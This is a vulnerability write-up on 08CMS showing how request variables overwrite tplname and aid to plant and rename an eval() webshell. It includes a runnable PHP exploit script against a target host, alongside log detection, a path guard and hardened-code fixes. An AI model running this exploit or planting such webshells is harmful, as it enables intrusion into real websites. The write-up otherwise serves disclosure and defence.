08CMS Variable Override: Writing an Arbitrary WEBSHELL to an Arbitrary Path

Time: 2023-03-08 20:33:38

Contents

. Vulnerability description
. Vulnerability trigger conditions
. Affected scope
. Vulnerable code analysis
. Defensive measures
. Attack and defense reflections

1. Vulnerability description

A brief description of the vulnerability

. /include/general.inc.php
// local variable registration
foreach(array('_POST','_GET') as $_request)
{
    foreach($$_request as $k => $v)
    {
        $k{0} != '_' && $$k = maddslashes($v);
    }
}
/*
This emulates register_globals (GPC): every variable in the user-supplied GET and POST data is registered into the local variable space, so in theory an attacker can "inject" arbitrary variable values into the application.
*/
. Through local variable override, an attacker can control the file-write operations the target application is about to perform and write arbitrary files to arbitrary locations under the site directory.

2. Vulnerability trigger conditions

0x1: Attack flow

. Upload a non-PHP file containing a webshell
/*
/tools/ptool.php
..
$cf = M_ROOT.'./dynamic/stats/aclicks.cac';
$ct = M_ROOT.'./dynamic/stats/aclicks_time.cac';
..
if(@$fp = fopen($cf,'a'))
{
    fwrite($fp,"$aid");
    fclose($fp);
..
By injecting $aid through the program's local variable override vulnerability, webshell code is written into /dynamic/stats/aclicks.cac
$exp = /tools/ptool.php?aid=<?php eval($_POST[a]);?>
*/
. At the second variable override point, pass in the path of that file (the file that is about to be opened):
$exp1 = /index.php?tplname=../../dynamic/stats/aclicks.cac
. The program opens /dynamic/stats/aclicks.cac and rewrites it into "/dynamic/stats/aclicks.cac.php", completing the GETSHELL

0x2: POC

<?php
/*
exp: index.php?tplname=../../dynamic/stats/aclicks.cac
Automobile CMS shell: /dynamic/tplcache/common/....dynamicstatsaclicks.cac.php
Home-decoration CMS shell: /dynamic/dynamic/stats/aclicks.cac.php

$exp  = /tools/ptool.php?aid=<?php eval($_POST[a]);?>
$exp1 = /index.php?tplname=../../dynamic/stats/aclicks.cac
*/
$exp  = '/tools/ptool.php?aid=%3C%3Fphp%20eval%28%24_POST%5Ba%5D%29%3B%3F%3E';
$exp1 = '/index.php?tplname=..%2f..%2fdynamic%2fstats%2faclicks.cac';

if ($argc < 2)
{
    print_r('
+---------------------------------------------------------------------------+
[+] php '.$argv[0].' [url]www.08sec.com[/url]
+---------------------------------------------------------------------------+
');
    exit;
}
error_reporting(E_ERROR);
set_time_limit(0);
$host = $argv[1];
go($host);

function go($host)
{
    global $exp,$exp1;
    $re = Send($host,$exp);
    stripos($re, "MySQL") > 0 ? Send($host, $exp) : "";
    $re = Send($host, $exp1) && stripos($re, "aclicks.cac") > 0 ? exit(" + Exploit Success!\r\n + http://$host/template/dynamic/stats/aclicks.cac.php\r\n") : exit(" - Exploit Failed!\n");
}
function Send($host,$url)
{
    $data  = "GET $url HTTP/1.1\r\n";
    $data .= "Host: $host\r\n";
    $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 2000) Opera 6.03 [en]\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Accept-Language: en-us\r\n";
    $data .= "Connection: Close\r\n\r\n";
    $fp = @fsockopen($host, 80);
    if (!$fp)
    {
        die("[-] Connect to host Error\r\n");
    }
    fwrite($fp, $data);
    $back = '';
    while (!feof($fp))
    {
        $back .= fread($fp, 1024);
    }
    fclose($fp);
    return $back;
}
?>

Relevant Link:

http://www.unhonker.com/bug/1390.html
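A log check a defender can run for the request patterns of this section, added here as an example and not part of the original post. The log lines are constructed; the un_virtual() substitution from the index.php excerpt is reproduced so that an encoded slash is decoded the same way 08CMS decodes it.

```php
<?php
// Added example (not from the original post): flag access-log entries that
// match the request patterns of this vulnerability. Log lines are constructed.

function flag_08cms_request($line)
{
    // Apache combined log: ... "GET /path?query HTTP/1.1" ...
    if (!preg_match('#"(?:GET|POST) (\S+) HTTP/#', $line, $m)) {
        return array();
    }
    list($path, $raw) = array_pad(explode('?', $m[1], 2), 2, '');
    // index.php passes the raw QUERY_STRING through un_virtual() before
    // parse_str(), turning '/' into '&' and '-' into '='. Only an encoded
    // slash (%2f) survives into tplname, so substitute first, then decode.
    parse_str(str_replace(array('/', '-'), array('&', '='), $raw), $p);

    $hits = array();
    if (isset($p['tplname']) && is_string($p['tplname'])
        && preg_match('#\.\.|/|\\\\#', $p['tplname'])) {
        $hits[] = 'tplname override with traversal: ' . $p['tplname'];
    }
    if (isset($p['aid']) && is_string($p['aid']) && stripos($p['aid'], '<?') !== false) {
        $hits[] = 'PHP open tag in aid (the ptool.php write primitive)';
    }
    if (preg_match('#\.cac\.php$#i', $path)) {
        $hits[] = 'request for a renamed cache file: ' . $path;
    }
    return $hits;
}

// Constructed log lines: the two requests from the attack flow, a follow-up
// request to the renamed file, and a benign pseudo-static request.
$log = array(
    '10.0.0.5 - - [08/Mar/2023:20:33:38 +0800] "GET /tools/ptool.php?aid=%3C%3Fphp%20...%3F%3E HTTP/1.1" 200 12',
    '10.0.0.5 - - [08/Mar/2023:20:33:39 +0800] "GET /index.php?tplname=..%2f..%2fdynamic%2fstats%2faclicks.cac HTTP/1.1" 200 3010',
    '10.0.0.5 - - [08/Mar/2023:20:33:40 +0800] "POST /dynamic/stats/aclicks.cac.php HTTP/1.1" 200 88',
    '10.0.0.9 - - [08/Mar/2023:20:35:01 +0800] "GET /index.php?tplname-index.htm HTTP/1.1" 200 3010',
);
foreach ($log as $i => $line) {
    foreach (flag_08cms_request($line) as $hit) {
        echo "line $i: $hit\n";
    }
}
```

The benign fourth line uses the pseudo-static "tplname-index.htm" form, which un_virtual() turns into a plain template name, so only the first three lines are reported.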

3. Affected scope

08CMS, all commercial editions

4. Vulnerable code analysis

Local variable registration implementation (the registration loop in /include/general.inc.php quoted in section 1)

/include/general.inc.php


/index.php

include_once dirname(__FILE__).'/include/general.inc.php';
include_once M_ROOT.'./include/common.fun.php';
if_siteclosed();
mobile_open() || message('手机版尚未开放');
/*
function un_virtual($str)
{
    ......
    $str = str_replace(array('/','-'),array('&','='),$str); // replaces / and - with & and =
    ......
    return $str;
}
parse_str() parses the query string into variables and stores them in the array $temparr
*/
parse_str(un_virtual($_SERVER['QUERY_STRING']), $temparr);
...
$_da = array();
if(!$cnstr)
{
    // $tplname is defined here, i.e. it is initialised
    $tplname = $_ismobile ? $o_index_tpl : $hometpl ;
    $_da['rss'] = $cms_abs.'rss.php';
    $_da += $temparr; // $_da = $_da + $temparr
    unset($temparr); // destroy the variable
    // variable override: this lets us control $tplname, i.e. overwrite it again
    extract($_da,EXTR_OVERWRITE);
    // this tpl_refresh function is the key point of exploitation
    tpl_refresh($tplname);
...

/include/refresh.fun.php

function tpl_refresh($tplname)
{
    global $templatedir,$debugtag;
    $tdir = M_ROOT."template/$templatedir/";
    // $tplname is attacker-controlled, so $cacf is effectively attacker-controlled as well
    $cacf = $tdir.'pcache/'. $tplname.'.php';
    if(file_exists($x = $tdir."function/utags.fun.php"))
    {
        include_once $x;
    }
    mmkdir($cacf,,);
    if($debugtag || !file_exists($cacf))
    {
        // open the file and return its contents
        $str = load_tpl($tplname);
        $tpl = @file2str(M_ROOT."template/$templatedir/".$tplname); // file2str is the function that opens the file
        $rt && $tpl = preg_replace("/{tpl\$(.+?)}/ies", "rtagval('\1','$rt')",$tpl);
        // filtering
        $str = preg_replace("/<\?(?!php\s|=|\s)/i", '<?=\'<?\'?>', $str);
        $str = preg_replace("/<!--{(.+?)}-->/s", "{\1}", $str);
        breplace($str,'');
        nreplace($str);
        quit_refresh_var();
        $str = tpl_basecode($str);
        /*
        The crux of the vulnerability is here:
        1. $str: attacker-controlled. It is the content of a .cac file, and the attacker can write a .cac file containing a webshell to the server through the other variable override.
        2. $cacf: attacker-controlled. The parameter the attacker passes in is the path of a non-PHP file (the .cac file), which really exists because it can be uploaded through the other variable injection; the program then appends ".php" to it, so what gets written is a PHP file. In effect this is a suffix rename from .cac to .php.
        */
        str2file($str, $cacf);
    }
    unset($str,$tdir,$cacf);
}
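A path guard for tpl_refresh(), added as an example rather than taken from 08CMS: it accepts only plain template names and rejects any name that resolves outside the template directory. The function name, the sandbox layout and the file names are constructed for the example.

```php
<?php
// Added example (not 08CMS code): vet $tplname before tpl_refresh() derives
// the source template and the pcache/<name>.php target from it.

// Return the canonical template path, or null when the name is not a plain
// template name or does not resolve inside $tdir.
function safe_tpl_path($tdir, $tplname)
{
    // Plain names only: letters, digits, '_', '-', '/' and one template extension.
    // The character class contains no '.', so a '..' segment can never match.
    if (!is_string($tplname) || !preg_match('#^[a-zA-Z0-9_/-]+\.(htm|html|tpl)$#', $tplname)) {
        return null;
    }
    $base = realpath($tdir);
    $real = realpath($tdir . '/' . $tplname);
    if ($base === false || $real === false) {
        return null; // template directory or template file does not exist
    }
    // realpath() resolved symlinks and '.' segments; now require the directory prefix.
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Constructed sandbox mirroring the paths discussed in the analysis.
$root = sys_get_temp_dir() . '/tplguard_' . getmypid();
mkdir("$root/template/default", 0700, true);
mkdir("$root/dynamic/stats", 0700, true);
file_put_contents("$root/template/default/index.htm", '<html>ok</html>');
file_put_contents("$root/dynamic/stats/aclicks.cac", 'uploaded, not a template');
$tdir = "$root/template/default";

$cases = array(
    'index.htm',                        // legitimate template inside $tdir
    '../../dynamic/stats/aclicks.cac',  // the traversal used in the attack flow
    'sub/../index.htm',                 // '.' is not in the name pattern
    'missing.htm',                      // well-formed but absent
);
foreach ($cases as $name) {
    $path = safe_tpl_path($tdir, $name);
    echo str_pad($name, 34) . ($path === null ? 'rejected' : 'ok: ' . $path) . "\n";
}
// With a vetted name, $cacf = $tdir.'/pcache/'.$tplname.'.php' can only land under pcache/.

// Remove the sandbox.
foreach (array("$root/template/default/index.htm", "$root/dynamic/stats/aclicks.cac") as $f) unlink($f);
foreach (array("$root/template/default", "$root/template", "$root/dynamic/stats", "$root/dynamic", $root) as $d) rmdir($d);
```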

5. Defensive measures

/index.php

if(!$cnstr)
{
    // $tplname is defined here, i.e. it is initialised
    $tplname = $_ismobile ? $o_index_tpl : $hometpl ;
    $_da['rss'] = $cms_abs.'rss.php';
    $_da += $temparr; // $_da = $_da + $temparr
    unset($temparr); // destroy the variable
    /*
    If a variable of that name already exists, it is not overwritten
    */
    extract($_da, EXTR_SKIP);
    tpl_refresh($tplname);
...

6. Attack and defense reflections

Defensive approaches against variable override

. Re-run the original code logic, assigning the overwritten variables back to their original values
. Check the variable names against a keyword list at the entry point of local variable registration
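A hardened variant of the registration loop from section 1 that applies the second approach above (a check on the names at the registration entry point), added as an example and not taken from 08CMS; every function and list name is hypothetical and the request data is constructed.

```php
<?php
// Added example (not 08CMS code): a hardened replacement for the "simulated
// GPC" loop in /include/general.inc.php. Names are hypothetical and the
// protected list is constructed for the example.

// Variables the application assigns itself; a request must never set them.
$PROTECTED_NAMES = array('tplname', 'templatedir', 'debugtag', 'cnstr', 'aid', 'cf', 'ct', 'cacf');

// Select the request variables that may be registered locally. A key is
// accepted only if it is a plain identifier (which also drops the '_'-prefixed
// keys the original loop checked for), is not a protected name, and is not
// already present in $existing (the variables the caller initialised itself).
function safe_request_vars(array $get, array $post, array $existing, array $protected)
{
    $out = array();
    foreach (array($get, $post) as $request) {
        foreach ($request as $k => $v) {
            if (!is_string($k) || !preg_match('/^[a-zA-Z][a-zA-Z0-9_]*$/', $k)) {
                continue;
            }
            if (in_array($k, $protected, true) || array_key_exists($k, $existing)) {
                continue;
            }
            $out[$k] = is_array($v) ? $v : addslashes($v); // stand-in for maddslashes()
        }
    }
    return $out;
}

// Constructed request reproducing the two override points described in this post.
$fake_get    = array('tplname' => '../../dynamic/stats/aclicks.cac', 'page' => '2', '_POST' => 'x');
$fake_post   = array('aid' => '<?php /* constructed marker */ ?>', 'kw' => "o'neil");
$initialised = array('tplname' => 'index.htm');

$vars = safe_request_vars($fake_get, $fake_post, $initialised, $PROTECTED_NAMES);
// 'tplname' and 'aid' are protected (tplname is also already initialised) and
// '_POST' is not a plain identifier, so only 'page' and 'kw' are registered.
print_r($vars);
// EXTR_SKIP is the second line of defence: an existing variable is never overwritten.
extract($vars, EXTR_SKIP);
```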

Copyright (c) 2014 LittleHann All rights reserved